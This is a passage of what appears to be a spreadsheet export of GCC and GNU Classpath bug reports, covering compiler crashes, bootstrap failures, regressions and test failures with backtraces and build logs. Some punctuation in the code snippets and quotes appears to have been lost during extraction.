    at ../../egcs/gcc/expr.c:3903
#5  0x81a8d3a in expand_expr (exp=0x4019e980 target=0x401a10c0 tmode=QImode 
    modifier=EXPAND_NORMAL) at ../../egcs/gcc/expr.c:8321
#6  0x81a1b63 in store_expr (exp=0x4019e980 target=0x401a10c0 want_value=0)
    at ../../egcs/gcc/expr.c:4036
#7  0x81a086f in expand_assignment (to=0x401a0c30 from=0x4019e980 
    want_value=0 suggest_reg=1) at ../../egcs/gcc/expr.c:3860
#8  0x81a8b63 in expand_expr (exp=0x4019ea00 target=0x0 tmode=VOIDmode 
    modifier=EXPAND_NORMAL) at ../../egcs/gcc/expr.c:8335
#9  0x8191af6 in expand_return (retval=0x4019ea00)
    at ../../egcs/gcc/stmt.c:3123
#10 0x8147281 in genrtl_return_stmt (stmt=0x401a21a4)
    at ../../egcs/gcc/c-semantics.c:536
#11 0x8147f39 in expand_stmt (t=0x401a2014) at ../../egcs/gcc/c-semantics.c:786
#12 0x8147fa9 in expand_stmt (t=0x401a2000) at ../../egcs/gcc/c-semantics.c:814
#13 0x811ff8e in expand_body (fn=0x4019d958)
    at ../../egcs/gcc/cp/semantics.c:2422
#14 0x809ff35 in instantiate_decl (d=0x4019d958 defer_ok=0)
    at ../../egcs/gcc/cp/pt.c:9984
#15 0x80a086b in instantiate_pending_templates ()
    at ../../egcs/gcc/cp/pt.c:10057
#16 0x80c236c in finish_file () at ../../egcs/gcc/cp/decl2.c:3629
#17 0x80d6915 in yyparse_1 () at /usr/lib/bison.simple:441
#18 0x814e9fd in compile_file (name=0x8473ee3 x2.cc)
    at ../../egcs/gcc/toplev.c:2379
#19 0x815285c in main (argc=3 argv=0xbffff914) at ../../egcs/gcc/toplev.c:4879
#20 0x4003dfd1 in __libc_start_main (main=0x8152380  argc=3 
    ubp_av=0xbffff914 init=0x8049198  fini=0x834eb9c  
    rtld_fini=0x4000e254  stack_end=0xbffff90c)
    at ../sysdeps/generic/libc-start.c:118
(gdb) p loc
$1 = 0x0</t>
  </si>
  <si>
    <t>GCC-50836</t>
  </si>
  <si>
    <t>[4.7 regression] bootstrap fails due to error: no previous prototype for 'find_all_hard_reg_sets'</t>
  </si>
  <si>
    <t>gcc-4.7-20111022 failed to bootstrap on i686-linux for me due to:
/mnt/scratch/objdir47/./prev-gcc/xgcc -B/mnt/scratch/objdir47/./prev-gcc/ -B/mnt/scratch/install47/i686-pc-linux-gnu/bin/ -B/mnt/scratch/install47/i686-pc-linux-gnu/bin/ -B/mnt/scratch/install47/i686-pc-linux-gnu/lib/ -isystem /mnt/scratch/install47/i686-pc-linux-gnu/include -isystem /mnt/scratch/install47/i686-pc-linux-gnu/sys-include    -c   -g -O2 -gtoggle -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat   -DHAVE_CONFIG_H -I. -I. -I/mnt/scratch/gcc-4.7-20111022/gcc -I/mnt/scratch/gcc-4.7-20111022/gcc/. -I/mnt/scratch/gcc-4.7-20111022/gcc/../include -I/mnt/scratch/gcc-4.7-20111022/gcc/../libcpp/include -I/home/mikpe/pkgs/linux-x86/gmp-5.0.2/include -I/home/mikpe/pkgs/linux-x86/mpfr-3.0.1/include -I/home/mikpe/pkgs/linux-x86/mpc-0.9/include  -I/mnt/scratch/gcc-4.7-20111022/gcc/../libdecnumber -I/mnt/scratch/gcc-4.7-20111022/gcc/../libdecnumber/bid -I../libdecnumber    /mnt/scratch/gcc-4.7-20111022/gcc/rtlanal.c -o rtlanal.o
/mnt/scratch/gcc-4.7-20111022/gcc/rtlanal.c:1017:1: error: no previous prototype for 'find_all_hard_reg_sets' [-Werror=missing-prototypes]
cc1: all warnings being treated as errors
make[3]: *** [rtlanal.o] Error 1
make[3]: Leaving directory `/mnt/scratch/objdir47/gcc'
make[2]: *** [all-stage2-gcc] Error 2
make[2]: Leaving directory `/mnt/scratch/objdir47'
make[1]: *** [stage2-bubble] Error 2
make[1]: Leaving directory `/mnt/scratch/objdir47'
make: *** [bootstrap] Error 2
gcc-4.7-20111015 built Ok on that machine.
Configured as:
/mnt/scratch/gcc-4.7-20111022/configure --prefix=/mnt/scratch/install47 --with-gmp=/home/mikpe/pkgs/linux-x86/gmp-5.0.2 --with-mpfr=/home/mikpe/pkgs/linux-x86/mpfr-3.0.1 --with-mpc=/home/mikpe/pkgs/linux-x86/mpc-0.9 --disable-plugin --disable-lto --disable-nls --enable-threads=posix --enable-checking=release --disable-libmudflap --enable-languages=cc++objcobj-c++javafortranada --disable-build-poststage1-with-cxx</t>
  </si>
  <si>
    <t>GCC-33890</t>
  </si>
  <si>
    <t>[4.3 regression] ICE in tsubst_copy with OpenMP</t>
  </si>
  <si>
    <t>I receive an internal compiler error for a certain C++ source file when enabling OpenMP.  I compile with
$ /usr/local/packages/numrel/gcc-129614/bin/g++-129614 -c reduce.ii -fopenmp
and receive the error message
/home/eschnett/Calpha/arrangements/Carpet/CarpetReduce/src/reduce.cc: In function â€˜void CarpetReduce::reduce(const int* const int* const int* const std::vector &gt;&amp; const std::vector &gt;&amp; void* void* const CCTK_REAL8* CCTK_REAL8) [with T = int OP = CarpetReduce::count::op]â€™:
/home/eschnett/Calpha/arrangements/Carpet/Carpet/src/typecase:126:   instantiated from here
/home/eschnett/Calpha/arrangements/Carpet/CarpetReduce/src/reduce.cc:512: internal compiler error: in tsubst_copy at cp/pt.c:9828
I am using the following version of g++:
$ /usr/local/packages/numrel/gcc-129614/bin/g++-129614 -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: /home/eschnett/src/gcc/configure --prefix=/usr/local/packages/numrel/gcc-129614 --disable-multilib --with-gmp=/usr/local/packages/numrel/gmp-4.2.1 --with-mpfr=/usr/local/packages/numrel/mpfr-2.2.1 --enable-languages=cc++fortranjavaobjctreelang --program-suffix=-129614
Thread model: posix
gcc version 4.3.0 20071024 (experimental) (GCC) 
I append the preprocessed source code.</t>
  </si>
  <si>
    <t>GCC-18533</t>
  </si>
  <si>
    <t>EXTRA_MULTILIB_PARTS are used to build libgcc_s.so for multilib</t>
  </si>
  <si>
    <t>For multilib EXTRA_MULTILIB_PARTS are used to build libgcc_s.so. I
don't think it should be there at all.</t>
  </si>
  <si>
    <t>GCC-29269</t>
  </si>
  <si>
    <t>missing documentation for vcond (vector conditional operation)</t>
  </si>
  <si>
    <t>missing documentation for vcond (vector conditional operation).</t>
  </si>
  <si>
    <t>GCC-32269</t>
  </si>
  <si>
    <t>[4.3 Regression] 403.gcc miscompiled</t>
  </si>
  <si>
    <t>SPEC2006 403.gcc is miscompiled so we ICE building scilab.i:
scilab.i:12953: Internal compiler error in remove_useless_values at cselib.c:394
flags used for building 403.gcc are -O3 -funroll-loops -fpeel-loops -ftree-vectorize.  (base with -O2 still works ok)
The change happened between r125530 (last working rev) and r125567 (first failing rev).</t>
  </si>
  <si>
    <t>GCC-78148</t>
  </si>
  <si>
    <t>[7 Regression] r241649 causes -fcompare-debug failure on ppc64le</t>
  </si>
  <si>
    <t>Since r241649:
commit 3d3e04acc6a8f7545d2c589319162967fb7f763a
Author: ktkachov 
Date:   Fri Oct 28 14:18:50 2016 +0000
    GIMPLE store merging pass
I get a -fcompare-debug failure when building the Linux kernel on ppc64le.
trippels@gcc2-power8 linux % cat ipmi_msghandler.i
struct ipmi_system_interface_addr {
  int addr_type
  int channel
}
struct kernel_ipmi_msg {
  char netfn
  char cmd
}
extern void fn2(struct ipmi_system_interface_addr struct kernel_ipmi_msg)
typedef struct ipmi_smi *ipmi_smi_t
struct ipmi_channel {
  char medium
  char protocol
} a
ipmi_smi_t e
struct ipmi_smi {
  int curr_channel
  struct ipmi_channel channels[]
} fn1() {
  int b
  struct kernel_ipmi_msg c
  struct ipmi_system_interface_addr d
  d.channel = c.netfn = c.cmd = 0
  fn2(d c)
}
void fn3() {
  e-&gt;channels[0].medium = e-&gt;channels[0].protocol = 0
  fn1()
}
trippels@gcc2-power8 linux % gcc -fcompare-debug -mno-altivec -mno-vsx -O2 -c ipmi_msghandler.i
gcc: error: ipmi_msghandler.i: -fcompare-debug failure (length)
--- ipmi_msghandler.gkd 2016-10-28 17:17:23.537929840 +0000
+++ ipmi_msghandler.gk.gkd      2016-10-28 17:17:23.587931015 +0000
@@ -1427 +1427 @@
         (mem/f/c:DI (reg/f:DI 9 9 [158]) [ e+0 S8 A64])) ipmi_msghandler.i:27# {*movdi_internal64}
      (nil))
 (insn # 0 0 (set (mem:HI (plus:DI (reg/f:DI 9 9 [orig:155 e.0_1 ] [155])
-                (const_int 4 [0x4])) [ MEM[(char *)e.0_1 + 4B]+0 S2 A8])
+                (const_int 4 [0x4])) [ MEM[(char *)e.0_1 + 4B]+0 S2 A32])
         (reg:HI 10 10 [159])) ipmi_msghandler.i:27# {*movhi_internal}
      (expr_list:REG_DEAD (reg:HI 10 10 [159])
         (expr_list:REG_DEAD (reg/f:DI 9 9 [orig:155 e.0_1 ] [155])</t>
  </si>
  <si>
    <t>GCC-7168</t>
  </si>
  <si>
    <t>C++ Exceptions in Multithreaded Applications Crash (cygwin)</t>
  </si>
  <si>
    <t>Superceeds gnats/7167
using the C++ exception system from multiple threads corrupts the gcc's internal exception stack due to not including the thread-specific exception context in the compile.
Release:
2.95.3-5 (cygwin special)
Environment:
Cygwin stock cygwin.com 1.3 install MS Windows  (any)
How-To-Repeat:
The attached program will determine whether the exception context is thread-specific or not</t>
  </si>
  <si>
    <t>lprimak</t>
  </si>
  <si>
    <t>GCC-34994</t>
  </si>
  <si>
    <t>gfortran.dg/missing_optional_dummy_5.f90 doesn't work</t>
  </si>
  <si>
    <t>On Linux/Intel64 with revision 131893 I got
Executing on host: /export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/gfortran/../../gfortran -B/export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/gfortran/../../ /export/gnu/src/gcc/gcc/gcc/testsuite/gfortran.dg/missing_optional_dummy_5.f90   -O  -fdump-tree-original -S  -m32 -o missing_optional_dummy_5.s    (timeout = 300)
PASS: gfortran.dg/missing_optional_dummy_5.f90  -O  (test for excess errors)
FAIL: gfortran.dg/missing_optional_dummy_5.f90  -O  scan-tree-dump original  tm_doit \(</t>
  </si>
  <si>
    <t>GCC-5487</t>
  </si>
  <si>
    <t>arm-linux-gcj cross-compiler generates bad assembler-code</t>
  </si>
  <si>
    <t>Compiling specific Java file of the Red Hat GCJ/rhug tree:
arm-linux-gcj -fCLASSPATH=upstream/src:./upstream/src -O2 -save-temps -dp -v --encoding=8859_1 -fassume-compiled -O2 -c upstream/src/org/apache/xerces/validators/dtd/DTDGrammar.java -MT upstream/src/org/apache/xerces/validators/dtd/lib_org_apache_xerces_la-DTDGrammar.lo -MD -MP -MF upstream/src/org/apache/xerces/validators/dtd/.deps/lib_org_apache_xerces_la-DTDGrammar.TPlo  -fPIC  -o upstream/src/org/apache/xerces/validators/dtd/.libs/lib_org_apache_xerces_la-DTDGrammar.lo
Using arm-linux-gcc cross-compiler GCJ generates object-files with undefined symbol references. For example:
/home/jsantala/rhug-clean/xerces/.libs/lib-org-apache-xerces.so: undefined reference to `.L153'
/home/jsantala/rhug-clean/xerces/.libs/lib-org-apache-xerces.so: undefined reference to `.L156'
nm output of affected source module:
         U .L153
         U .L156
000000d8 d _CD_org_apache_xerces_validators_dtd_DTDGrammar
...
From assembler source:
...
.L164:
        bl      _Jv_ThrowBadArrayIndex(PLT)     @ 855   *call_value_symbol/1
[length = 4]
        .align  2
.L155:
        b       .L156
        b       .L156
        b       .L156
        b       .L156
        b       .L156
        b       .L156
        b       .L153
.L166:
        ldr     r3 .L169+20    @ 1003  pic_load_addr_arm       [length = 4]
...
If compiler is ran with -fverbose-asm it crashes with segmentation fault ICE:
gcc version 3.1 20020122 (experimental)
GNU Java version 3.1 20020122 (experimental) (arm-linux)
        compiled by GNU C version 3.0.3.
Class path starts here:
    upstream/src/
    ./upstream/src/
    ./
    /skiff/local/share/libgcj.jar/ (system) (zip)
upstream/src/org/apache/xerces/validators/dtd/DTDGrammar.java:174: internal error: Segmentation fault
(gdb) where
#0  get_mem_expr_from_op (op=0x0 paddressp=0xbfffef98)
    at ../../gcc/gcc/final.c:3016
#1  0x08127f09 in output_asm_operand_names (operands=0xbffff1b0
    oporder=0xbffff050 nops=1) at ../../gcc/gcc/final.c:3061
#2  0x08128053 in output_asm_insn (
    template=0xbffff110 ldm%?%d0fd\t%|sp! {%|r4 %|r5 %|r6 %|r7 %|r8 %|r9 %|sl %|pc} operands=0xbffff1b0) at ../../gcc/gcc/final.c:3289
#3  0x0822130b in output_return_instruction (operand=0x0 really_return=1
    reverse=0) at ../../gcc/gcc/config/arm/arm.c:7353
#4  0x0816eeed in output_259 (operands=0x83623c0 insn=0x4039a640)
    at insn-output.c:1325
#5  0x08126cc4 in get_insn_template (code=259 insn=0x4039a640)
    at ../../gcc/gcc/final.c:1809
#6  0x0812701c in final_scan_insn (insn=0x4039a640 file=0x8385d88
    optimize=2 prescan=0 nopeepholes=0) at ../../gcc/gcc/final.c:2591
#7  0x08126c0a in final (first=0x40396580 file=0x8385d88 optimize=2
    prescan=0) at ../../gcc/gcc/final.c:1787
#8  0x081f78b4 in rest_of_compilation (decl=0x401c1d98)
    at ../../gcc/gcc/toplev.c:3464
#9  0x08063d94 in source_end_java_method () at ../../gcc/gcc/java/parse.y:7457
#10 0x08065ab1 in java_expand_method_bodies (class=0x401ba6cc)
    at ../../gcc/gcc/java/parse.y:8133
...
File DTDGramma.java from Apache-XML Xerces-Java project attached. Linking passes with -O0 but not with -O1 or -O2
Release:
3.1 20020122 (experimental)
Environment:
Using Red Hat 7.1 with GCC compiled as arm-linux cross-compiler.
How-To-Repeat:
arm-linux-gcj -fCLASSPATH=upstream/src:./upstream/src -O2 -save-temps -dp -v --encoding=8859_1 -fassume-compiled -O2 -c upstream/src/org/apache/xerces/validators/dtd/DTDGrammar.java -MT upstream/src/org/apache/xerces/validators/dtd/lib_org_apache_xerces_la-DTDGrammar.lo -MD -MP -MF upstream/src/org/apache/xerces/validators/dtd/.deps/lib_org_apache_xerces_la-DTDGrammar.TPlo  -fPIC  -o upstream/src/org/apache/xerces/validators/dtd/.libs/lib_org_apache_xerces_la-DTDGrammar.lo
Have not tried to minimize test-case yet.</t>
  </si>
  <si>
    <t>jsantala</t>
  </si>
  <si>
    <t>GCC-5457</t>
  </si>
  <si>
    <t>Writing to buffer stream writes each byte using a system write() call.</t>
  </si>
  <si>
    <t>When writing to cout each character is being written via
the system write() call.Ouput of strace:
...
fstat64(1 {st_mode=S_IFCHR|0620 st_rdev=makedev(136 7) ...}) = 0
mmap2(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1 0) = 0x40206000
ioctl(1 TCGETS {B38400 opost isig icanon echo ...}) = 0
write(1 H 1H)                        = 1
write(1 e 1e)                        = 1
write(1 l 1l)                        = 1
write(1 l 1l)                        = 1
write(1 o 1o)                        = 1
write(1   1 )                        = 1
write(1 W 1W)                        = 1
write(1 o 1o)                        = 1
write(1 r 1r)                        = 1
write(1 l 1l)                        = 1
write(1 d 1d)                        = 1
write(1 ! 1!)                        = 1
write(1 \n 1
)                       = 1
munmap(0x40206000 4096)                = 0
_exit(0)                                = ?
Release:
gcc-3.0.3
Environment:
RedHat 7.2 Linux/Intel
Reading specs from /ldcg/lib/gcc-lib/i686-pc-linux-gnu/3.0.3/specs
Configured with: ../configure --prefix=/ldcg --with-prefix=/ldcg --enable-long-long
Thread model: single
gcc version 3.0.3
How-To-Repeat:
g++ t.cc
strace ./a.out</t>
  </si>
  <si>
    <t>emaros</t>
  </si>
  <si>
    <t>GCC-50528</t>
  </si>
  <si>
    <t>[4.7 Regression] SPEC CPU 2006 failed to build with LTO</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 179164 failed to build 416.gamess
447.dealII and 481.wrf with LTO. Failure is
gfortran  -O2 -ffast-math -fwhole-program -flto=jobserver -fuse-linker-plugin  -DSPEC_CPU_LP64 ...
lto1: internal compiler error: in account_size_time at ipa-inline-analysis.c:601
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
lto-wrapper: gfortran returned 1 exit status
/usr/local/bin/ld: lto-wrapper failed
collect2: error: ld returned 1 exit status
Revision 179104 is OK.</t>
  </si>
  <si>
    <t>GCC-30720</t>
  </si>
  <si>
    <t>[4.1 only] runtime: check for empty array slices before allocating a negative amount of memory</t>
  </si>
  <si>
    <t>The program below terminates with a runtime error due to an attempt to allocate a negative amount of memory. The error occurs while allocating memory for a temporary empty array slice. 
$&gt; cat pr.f90
program runtime_error
  REAL    :: a(5) b
  INTEGER :: l u
  l = 4
  u = 2
  a = (/ 1.0 2.0 3.0 4.0 5.0 /)
  b = f(a(l:u) - 3.0)
  CONTAINS
    REAL FUNCTION f(x)
      REAL DIMENSION(:) INTENT(in) :: x
      f = sum(x)
    end function
END PROGRAM
There are two issues here:
 a) the runtime error as described above
$&gt; gfortran-svn -O -fdump-tree-original -fdump-tree-optimized pr.f90
from dump-tree-original:
      int4 D.1036
      void * D.1035
      int4 D.1034
      struct array1_real4 atmp.7
      int4 D.1032
      int4 D.1031
      D.1031 = l
      D.1032 = u
      atmp.7.dtype = 281
      atmp.7.dim[0].stride = 1
      atmp.7.dim[0].lbound = 0
      atmp.7.dim[0].ubound = u - D.1031
      D.1034 = (u - D.1031) + 1
      D.1035 = _gfortran_internal_malloc (D.1034 * 4)
      atmp.7.data = D.1035
from dump-tree-optimized:
  void * SR.31
  [...]
  SR.31 = _gfortran_internal_malloc (-4)
  _gfortran_internal_free (SR.31)
Here if l &gt; u+1 D.1035 will be negative and trigger the runtime error.
In this case a runtime check whether the slice is empty before calling _gfortran_internal_malloc() would result in code not stopping with a (seemingly) unrelated error message.
 b) missed optimization during constant folding:
from dump-tree-original:
      struct array1_real4 atmp.7
      atmp.7.dtype = 281
      atmp.7.dim[0].stride = 1
      atmp.7.dim[0].lbound = 0
      atmp.7.dim[0].ubound = -1
      atmp.7.data = 0B
      [...]
      _gfortran_internal_free (atmp.7.data)
from dump-tree-optimzed:
  _gfortran_internal_free (0B)
If the boundaries are known at compile time e.g. a(4:2) no memory is allocated for the array descriptor but _gfortran_internal_free(0B) is called nonetheless. This call is still visible after optimization.
$&gt; gfortran-svn -v
gcc version 4.3.0 20070126 (experimental)</t>
  </si>
  <si>
    <t>GCC-18782</t>
  </si>
  <si>
    <t>[4.0 regression] ICE on invalid pointer-to-member declaration</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE on mainline:
=====================
namespace A {}
int A::* p
=====================
bug.cc:2: internal compiler error: tree check: expected class 'type' have
'declaration' (namespace_decl) in build_offset_type at tree.c:4591
Please submit a full bug report [etc.]
The regression was introduced in June:
: Search converges between 2004-06-22-trunk (#470) and 2004-06-24-trunk (#471).</t>
  </si>
  <si>
    <t>CLASSPATH-22909</t>
  </si>
  <si>
    <t>ImageIO.java : bad cast?</t>
  </si>
  <si>
    <t>In the filter() method of the static class ReaderFormatFilter (around line 81 of the ImageIO.java source file) there is this code:
if (provider instanceof ImageReaderSpi)
  {
    ImageWriterSpi spi = (ImageWriterSpi) provider
    ...
I'm guessing that ImageWriterSpi should be replaced with ImageReaderSpi.</t>
  </si>
  <si>
    <t>GCC-47183</t>
  </si>
  <si>
    <t>Please discard unused functions</t>
  </si>
  <si>
    <t>Created attachment 22908
Testcase
Compile it with `g++ -O2 -flto -fuse-linker-plugin 47183.C'.</t>
  </si>
  <si>
    <t>GCC-65479</t>
  </si>
  <si>
    <t>sanitizer stack trace missing frames past #0 on powerpc64</t>
  </si>
  <si>
    <t>On both powerpc64 and powerpc64le the c-c++-common/asan/misalign-1.c shows 6 failures all in the output pattern test.  The failures are due to to the stack trace missing stack frame #1 (it only includes frame #0).  It looks like the backtrace on powerpc doesn't work correctly.
=================================================================
==87868==ERROR: AddressSanitizer: unknown-crash on address 0x3fffc231eb2f at pc 0x000010000ce8 bp 0x3fffc231e9f0 sp 0x3fffc231ea10
READ of size 4 at 0x3fffc231eb2f thread T0
    #0 0x10000ce4 in foo /src/gcc-5.0-git/gcc/testsuite/c-c++-common/asan/misalign-1.c:11
Address 0x3fffc231eb2f is located in stack of thread T0 at offset 175 in frame
    #0 0x1000086c in main /src/gcc-5.0-git/gcc/testsuite/c-c++-common/asan/misalign-1.c:28
  This frame has 3 object(s):
    [32 36) 'v'
    [96 100) 'w'
    [160 176) 't' &lt;== Memory access at offset 175 partially overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: unknown-crash /src/gcc-5.0-git/gcc/testsuite/c-c++-common/asan/misalign-1.c:11 foo
Shadow bytes around the buggy address:
  0x09fff8463d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x09fff8463d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x09fff8463d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x09fff8463d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x09fff8463d50: f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4 f4 f4
=&gt;0x09fff8463d60: f2 f2 f2 f2 00[00]f4 f4 f3 f3 f3 f3 00 00 00 00
  0x09fff8463d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x09fff8463d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x09fff8463d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x09fff8463da0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x09fff8463db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
==87868==ABORTING</t>
  </si>
  <si>
    <t>GCC-3973</t>
  </si>
  <si>
    <t>GCC fails to bootstrap with 80+160MB memory / optimization</t>
  </si>
  <si>
    <t>Bootstrap on a sparc-sun-solaris2.6 box with 80MB of main memory
plus 160MB of swap fails with out of memory:
stage2/xgcc -Bstage2/ -B/sw/test/gcc/SunOS/sparc-sun-solaris2.6/bin/ -c
-DIN_GCC    -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes
-Wmissing-prototypes   -DHAVE_CONFIG_H    -I. -Ijava -I/sw/test/gcc/cvs/gcc
-I/sw/test/gcc/cvs/gcc/java -I/sw/test/gcc/cvs/gcc/config
-I/sw/test/gcc/cvs/gcc/../include /sw/test/gcc/cvs/gcc/java/parse.c
-o java/parse.o
cc1: Cannot allocate 8744016 bytes after allocating 27115520 bytes
gmake[2]: *** [java/parse.o] Error 1
gmake[2]: Leaving directory `/tmp/OBJ-0808-0716/gcc'
gmake[1]: *** [stage3_build] Error 2
gmake[1]: Leaving directory `/tmp/OBJ-0808-0716/gcc'
gmake: *** [bootstrap-lean] Error 2
This is a regression from GCC 2.95.x and even GCC 3.0. Probably memory
leaks and inefficient/too expensive optimizations.
Release:
3.1 20010808 (experimental)
Environment:
System: SunOS hostname 5.6 Generic_105181-28 sun4m sparc sun4m
Architecture: sun4
host: sparc-sun-solaris2.6
build: sparc-sun-solaris2.6
target: sparc-sun-solaris2.6
configured with: /sw/test/gcc/cvs/configure --prefix=/sw/test/gcc/SunOS --enable-languages=cc++objcjava
How-To-Repeat:
	mkdir objdir  cd objdir
	$GCC_SOURCE/configure --enable-languages=cc++objcjava
	make bootstrap</t>
  </si>
  <si>
    <t>GCC-11074</t>
  </si>
  <si>
    <t>libstdc++ fails to build due to gettext issue</t>
  </si>
  <si>
    <t>When building on linux with an external gettext (i.e. using libintl
(libintl_gettext) instead of libc (gettext)) the abi_check program of the
libstdc++-v3 testsuite fails to build breaking the gcc build.
The problem is that libstdc++ uses gettext but abi_check is not linked with
libintl.  Simply adding the typical gettext configury to libstdc++-v3 (and
adding @INTLLIBS@ to $(LIBS) for the testsuite Makefile) should make it work (I
manually added -lintl to abi_check_LDADD and this allowed the build to proceed
normally).</t>
  </si>
  <si>
    <t>GCC-60958</t>
  </si>
  <si>
    <t>Initialization of arrays in tr1/regex ill-formed or with undefined behaviour</t>
  </si>
  <si>
    <t>The header tr1/regex contains code which is either ill-formed or has undefined behaviour.
Various C++ language tools choke on this file because of the code in question.
In particular C++03 subclause 8.5 [dcl.init] does not specify the semantics of the array initializations in question and they are ill-formed under C++11.
/usr/lib/gcc/x86_64-pc-cygwin/4.8.2/include/c++/tr1/regex:685:22: error: array
      initializer must be an initializer list
   const char* const __wb[] = w
                     ^
/usr/lib/gcc/x86_64-pc-cygwin/4.8.2/include/c++/tr1/regex:695:22: error: array
      initializer must be an initializer list
   const char* const __bb[] = blank
                     ^
VERSION INFO:
$ g++ --version
g++ (GCC) 4.8.2
Copyright (C) 2013 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.</t>
  </si>
  <si>
    <t>GCC-9502</t>
  </si>
  <si>
    <t>shift of long long broken</t>
  </si>
  <si>
    <t xml:space="preserve">From: Andrew Pinski 
To: roger.dahl@am.sony.com
Cc: gcc-gnats@gcc.gnu.org
Subject: Re: c/9502: shift of long long broken
Date: Wed 29 Jan 2003 10:37:29 -0800
 The warning is right 1 is not a long long but just an int.
 Use C99 way of say 1 is a long long by LL.
 Thanks
 Andrew Pinski
 On Wednesday Jan 29 2003 at 10:13 US/Pacific roger.dahl@am.sony.com 
 wrote:
 &gt;
 &gt;&gt; Number:         9502
 &gt;&gt; Category:       c
 &gt;&gt; Synopsis:       shift of long long broken
 &gt;&gt; Confidential:   no
 &gt;&gt; Severity:       serious
 &gt;&gt; Priority:       medium
 &gt;&gt; Responsible:    unassigned
 &gt;&gt; State:          open
 &gt;&gt; Class:          sw-bug
 &gt;&gt; Submitter-Id:   net
 &gt;&gt; Arrival-Date:   Wed Jan 29 18:16:00 UTC 2003
 &gt;&gt; Closed-Date:
 &gt;&gt; Last-Modified:
 &gt;&gt; Originator:     roger.dahl@am.sony.com
 &gt;&gt; Release:        3.2 and 2.96
 &gt;&gt; Organization:
 &gt;&gt; Environment:
 &gt; DJGPP MS-DOS (3.2) GCC Linux (2.96)
 &gt;&gt; Description:
 &gt; Shift in assignment fails when type is long long and shift argument is 
 &gt; &gt; 31
 &gt;&gt; How-To-Repeat:
 &gt; unsigned long long int a = 1 &lt;&lt; 32
 &gt;
 &gt; Note the compiler warning message and the resulting code.
 &gt;&gt; Fix:
 &gt; unsigned long long int a = 1
 &gt; a &lt;&lt;= 32
 &gt;&gt; Release-Note:
 &gt;&gt; Audit-Trail:
 &gt;&gt; Unformatted:
 &gt;
</t>
  </si>
  <si>
    <t>roger.dahl</t>
  </si>
  <si>
    <t>GCC-7818</t>
  </si>
  <si>
    <t>protected members still non-reachable from an unbound friend template member function</t>
  </si>
  <si>
    <t xml:space="preserve">	
3 problems.
1/ When a friend member function F() of an unbound template class
T is declared inside a template class C gcc
forbids access to the protected members of C from
T::F(). Work-around: declare an additional unbound friend class
U of C with a member function U::Toto() that
accesses the protected members of C with the same Foo for T
and U.
2/ If T binds C with Foo = Zorglub1 and U binds it with a
different Foo = Zorglub2 then none of the previous configurations
suite gcc: the same error for both T::F() and U::Toto()
complaining that the member they try to access is protected. No
work-around found.
3/ If class C is not a template class anymore then same symptoms. No
work-around found.
This behavior is common to gcc 3.0 3.0.1 3.0.4 and 3.1 at least
(solaris 2.7/sparc64). gcc-2.95.3 always fails (no work-around found
even for 1/).
Release:
3.1
Environment:
System: SunOS blutch 5.7 Generic_106541-19 sun4u sparc SUNWUltra-5_10
Architecture: sun4
host: sparc-sun-solaris2.7
build: sparc-sun-solaris2.7
target: sparc-sun-solaris2.7
configured with: ../gcc/gcc-3.1/configure --prefix /usr/local/gcc-3.1 --enable-shared --enable-languages=c++f77
How-To-Repeat:
See comments at the top of the file:
--------------------------------------------------------
// Bug 1: undefine macro HIDE_ERROR
// Bug 2: Bind TheClass c with something different then
//        short in bar() or member() (but not both)
// Bug 3: replace template  class TheClass with class
//        TheClass (ie no template) and update the TheClass c
//        accordingly
// Forward declaration
template  class AnotherFriend
template 
class TheClass
{
public:
protected:
  int prot_data
  template 
  friend class Friend    // unbound friend class
  template       // unbound friend member function
  friend void AnotherFriend::member()
}
#ifdef HIDE_ERROR
template 
class Friend
{
public:
  void bar()
  {
    TheClass c
    c.prot_data = 2
  }
}
#endif
template 
class AnotherFriend
{
public:
  void member()
  {
    TheClass c
    c.prot_data = 2
  }
}
int f()
{
#ifdef HIDE_ERROR
  Friend t
  t.bar()
#endif
  AnotherFriend ff
  ff.member()
  return 0
}
--------------------------------------------------------
Here is how it looks like:
  [blutch] /tmp/ddecotig &gt;g++-3.1 -DHIDE_ERROR -c a.cc
  # Ok
  [blutch] /tmp/ddecotig &gt;g++-3.1 -c a.cc
  a.cc: In member function `void AnotherFriend::member() [with Bar = int]':
  a.cc:59:   instantiated from here
  a.cc:16: `int TheClass::prot_data' is protected
  a.cc:47: within this context
  zsh: exit 1     g++-3.1 -c a.cc</t>
  </si>
